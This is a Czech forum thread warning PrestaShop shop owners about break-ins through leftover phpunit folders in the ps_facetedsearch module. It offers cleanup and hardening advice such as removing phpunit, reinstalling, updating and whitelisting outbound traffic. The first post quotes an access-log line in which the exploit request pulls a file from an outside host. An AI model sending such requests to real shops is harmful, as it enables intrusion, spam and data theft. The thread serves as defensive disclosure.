Prodej brandové domény světové značky Fred Perry
Zobrazují se odpovědi 1 až 4 z 4

[VAROVÁNÍ] PrestaShop modul ps_facetedsearch

  1. V poslední době jsem zaznamenal a čistil několik eshopů od brutálních entry point útoků přes modul ps_facetedsearch.

    Rozesílají spamy ve velkém.

    Jde to z více stránek.

    Ukázka jak se krásně dostanou ke všem vašim souborům:

    "POST /modules/ps_facetedsearch/vendor/phpunit/
    phpunit/src/Util/Log/JSUnit.php?
    php=http://supercornerelectronics.com/1/up.txt HTTP/1.1" 200 326



    Projděte si všechny moduly a odstraňte složky phpunit.

    Pokud byl již váš eshop napaden, bude nutná čistá instalace, změna přístupů do databáze a nová konfigurace eshopu.
    V žádném případě nekopíruje do čisté instalace původní soubory. Může být v nich již zapsána metoda GET nebo POST.

    Aktualizujete zejména PrestaShop 1.6, 1.7.0 až 1.7.6 !!!

  2. Co se právě děje na Webtrhu?
  3. panejo, phpunit nemá nikdy co dělat v produkčním sestavení. To je dobré info.

    Proti těmhle věcem používám FW, nedovolím php aplikaci libilovolně komunikovat s internetem, jen na whitelist domén/ip adres, radikálně se pak snížil vektor napadaní i děravách systémů, stejně kritické jsou zápisy do vlastních útrob (aktualizace jsou paradoxně nějvětší bezpečnostní riziko), řešení je odděleným uživatalem pro php na aktualizace.

    Hostingy zatím moc takovýhle bezpečnostních vrstev nenabízejí, což mě podivuje, vidím jen skenování. Většina adminů to zase není schopná nastavit, selinud automaticky vypínají misto, aby vyladili pravidla.

    Bohužel někteří klienti chtějí wordpress nebo prestu, takže se občas musím do vnitřností položit a nějak tomu hodit bezpečnou pozlátku. Bylo by super, kdyby to dělalo více firem.

  4. Je to relativně starší záležitost, ale věřím, že na mnoha eshopech to není vyřešeno...

    Oficiální info:
    Critical security vulnerability in PrestaShop modules | PrestaShop Developers’…

  5. No právě.
    Než dát pár set korun za odborně provedený upgrade, tak raději pár tisíc za kompletní čistou instalaci .....
    Eshopů na starších verzích běží mnoho.
    Dnes je moderní používat scraping pro vytáhnutí cen konkurence a také vykrádání databází k získání zákaznických účtů. A jsme u jádra věci. Hodně zákazníků používá pro lepší zapamatování stejná hesla a už to jede.

Spolupracujeme: Jooble.org, Aximum - profesionální překlady Hostujeme u Server powered by TELE3